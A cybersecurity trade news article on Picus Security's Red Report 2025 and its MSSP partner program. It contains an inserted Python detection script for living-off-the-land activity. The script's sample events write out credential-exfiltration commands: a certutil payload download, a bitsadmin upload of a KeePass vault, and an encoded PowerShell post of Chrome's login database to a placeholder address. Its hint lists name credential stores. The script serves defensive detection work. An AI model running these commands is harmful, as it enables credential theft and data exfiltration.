Bad actors are increasingly looking to steal credentials from password stores, and are doing so with more complex, multi-staged attacks using sophisticated malware, according to a report released Tuesday by threat researchers with Picus Security.
In its Red Report 2025, the Picus Labs researchers found that 25% of the malware analyzed last year was aimed at stealing credentials, a three-fold year-over-year jump. In addition, they said modern malware – which they describe with the coined term “SneakThief” – is evolving quickly, with a greater emphasis on stealth, persistence, and automation.
On average, malware samples now contain 14 malicious actions designed to evade detection, increase permissions, and exfiltrate data, they found.
Such growing sophistication in malware, along with the sheer number of cyberattacks, is helping to convince enterprises and SMBs alike to migrate some or all of their cybersecurity operations to MSSPs and MSPs. That can be seen in projections for the global managed security services market, which is expected to grow from $25.67 billion this year to $28.15 billion by 2029.
Picus and MSSPs
MSSPs play a central role in Picus’ efforts to grow the reach of its Exposure Validation Platform, which is used to assess an organization’s security posture, according to Ryan Kunker, senior director of channels and alliances for the channel-first vendor.
“The strength of Picus' partner ecosystem is essential to ensuring that organizations worldwide can leverage its cutting-edge exposure validation solutions,” Kunker told MSSP Alert. “Every aspect of Picus' business is conducted exclusively through its trusted network of partners.”
1 Million+ Malware Samples Analyzed
The findings in the report come from analyzing more than a million pieces of malware that Picus Labs collected last year. The researchers found that data exfiltration and stealth tactics made up 11.3 million actions, with threat actors transitioning to covert exfiltration techniques – which they called “whispering channels” – like encrypted communications and living-off-the-land methods to essentially hide the malicious efforts in legitimate traffic.
“The stakes have never been higher,” the researchers wrote in the report. “Attackers are no longer just exploiting vulnerabilities but are conducting sophisticated, multi-stage operations that resemble, in many cases, a precision-planned burglary.”
Persistence and exfiltration capabilities come through such tactics as process injection and encrypted application layer protocols, they said.
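The "whispering channels" the report describes, living-off-the-land binaries and encoded commands carrying data out inside what looks like legitimate activity, are the kind of thing a SOC has to catch in process-creation telemetry rather than at the perimeter. The script below is an added illustration of that detection logic; it is not code from Picus or from the Red Report. It runs over a handful of constructed, Sysmon Event ID 1-style records (process image plus command line, invented for this example, with TEST-NET addresses) and flags certutil and bitsadmin transfers, PowerShell encoded commands that decode to network cmdlets, and command lines that reference credential stores such as a browser login database or a KeePass vault. The rule names, hint lists and record layout are this example's own choices, not a vendor schema.

```python
"""Flag living-off-the-land (LOTL) transfer and credential-store activity in
process-creation logs.

Added illustration, not Picus or Red Report code. Events below are constructed
in a Sysmon Event ID 1-like shape so the script runs offline.
"""
import base64
import re
from typing import Optional

# Constructed sample events (not real telemetry). 203.0.113.0/24 is TEST-NET-3.
SAMPLE_EVENTS = [
    {"pid": 4012, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.7/stage2.bin "
                "C:\\Users\\Public\\s2.bin"},
    {"pid": 4013, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /upload http://203.0.113.7/up "
                "C:\\Users\\alice\\Documents\\vault.kdbx"},
    {"pid": 4014, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # -enc takes base64 of a UTF-16LE script; built here so the sample stays readable.
     "cmdline": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
         ("Invoke-WebRequest -Uri https://203.0.113.7/x -Method Post -InFile "
          "C:\\Users\\alice\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
          ).encode("utf-16-le")).decode()},
    {"pid": 4015, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\corp.cer"},           # benign use
    {"pid": 4016, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": "firefox.exe https://intranet.example.local"},           # benign
]

# Hypothetical hint lists chosen for this example; tune to your environment.
CRED_STORE_HINTS = ("login data", ".kdbx", "logins.json", "key4.db", "ntds.dit", "cookies")
PS_NET_HINTS = ("invoke-webrequest", "invoke-restmethod", "net.webclient",
                "uploadfile", "uploadstring", "-infile")


def decode_powershell_encoded(cmdline: str) -> Optional[str]:
    """Return the decoded script when cmdline carries -enc/-encodedcommand, else None.

    PowerShell expects base64 over a UTF-16LE string, so decode accordingly.
    """
    m = re.search(r"-(?:enc|encodedcommand|e|ec)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: dict) -> list:
    """Return (rule, detail) pairs that fire for one process-creation event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    low = cmd.lower()
    decoded = decode_powershell_encoded(cmd) if image in ("powershell.exe", "pwsh.exe") else None
    # Scan both the raw command line and any decoded script for store references.
    scan_text = low + " " + (decoded or "").lower()
    hits = []
    if image == "certutil.exe" and ("-urlcache" in low or "-encode" in low):
        hits.append(("certutil_transfer_or_encode", cmd))
    if image == "bitsadmin.exe" and "/transfer" in low and "/upload" in low:
        hits.append(("bitsadmin_upload", cmd))
    if decoded is not None and any(h in decoded.lower() for h in PS_NET_HINTS):
        hits.append(("powershell_encoded_network", decoded))
    if any(h in scan_text for h in CRED_STORE_HINTS):
        hits.append(("credential_store_reference", cmd))
    return hits


def scan(events: list) -> list:
    """Run classify over a batch of events and return flat finding records."""
    findings = []
    for ev in events:
        for rule, detail in classify(ev):
            findings.append({"pid": ev["pid"], "image": ev["image"],
                             "rule": rule, "detail": detail})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid={f['pid']} rule={f['rule']}: {f['detail'][:80]}")
```

Against the constructed events the benign certutil and Firefox records pass, the certutil download and bitsadmin upload fire, the encoded PowerShell fires twice (once for the network cmdlet, once because the decoded script names the Chrome login database), and the bitsadmin record also fires on the KeePass vault path. Decoding the encoded command before matching is the point: a signature on the raw command line sees only base64.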
As an interesting side note, the researchers said they didn’t find a significant increase from 2023 to last year in the use of AI-driven malware techniques used by hackers, despite ongoing worries about the emerging technology’s use by bad actors.
Credentials a Fast Way In
“Attackers realize that harvesting credentials can quickly pave the way to privileged systems or sensitive data,” Suleyman Ozarslan, Picus co-founder and vice president of Picus Labs, told MSSP Alert. “In many breaches, possessing an admin or domain-level credential is enough to compromise a large portion of an environment.”
They’re also using stealthy infostealers, allowing them to “remain in a network longer, siphoning credentials and escalating privileges, collecting and exfiltrating data,” Ozarslan said. “This prolonged network infiltration and data exfiltration allows them to exfiltrate crucial data and pivot to multiple systems undetected.”
More organizations are using password managers to make their passwords more secure, but this also makes the managers a high-value target for hackers, he said. Attackers try to unlock the tools, scrape their contents from memory, or use previously stolen passwords to log in to them. They also try to extract master keys and decrypt stored passwords.
More Complex Attacks
Because of this, attacks are becoming more complex at a time when many enterprises still rely on signature-based tools, patchwork fixes, and quarterly vulnerability scans, Ozarslan said. They are also hampered by personnel shortages and growing alert volumes, which strain resources and the time available to investigate.
“Although widely recommended, true micro-segmentation and least-privilege access are still not uniformly enforced,” he said. “This leaves holes that well-funded or methodical adversaries freely exploit. Once inside, attackers move laterally, harvest credentials, and exfiltrate data.”
Unprepared security teams relying on outdated detection methods and without consistent visibility into their IT environments will respond slowly to breaches, giving attackers more dwell time.
MSSPs Shore Up Defenses
MSSPs can help bridge these gaps, Kunker said. That includes providing organizations with experienced security analysts, incident responders and security operations center (SOC) teams, regulatory and compliance expertise, security framework recommendations like zero trust architectures and network segmentation, security tool optimizations, and greater resilience.
There is also a synergy in using MSSPs and Picus’ Exposure Validation Platform together: MSSPs interpret and act upon findings from the platform, while Picus provides automated testing and intelligence.
“Together, they enable businesses to detect, prioritize, and remediate security weaknesses effectively,” he said.
Picus continues to enhance and expand its MSSP Partner Program. In mid-January, the San Francisco-based company announced a partnership with Presidio, with the MSP now using Picus’ capabilities for services that cover such areas as ransomware, SOCs, and automated red teaming.
At the same time, Picus unveiled partner program enhancements to make it easier for MSPs and MSSPs to integrate exposure validations services into their offerings, including more flexible licensing options, customizable reporting, multi-tenancy, and one-touch tenant creation.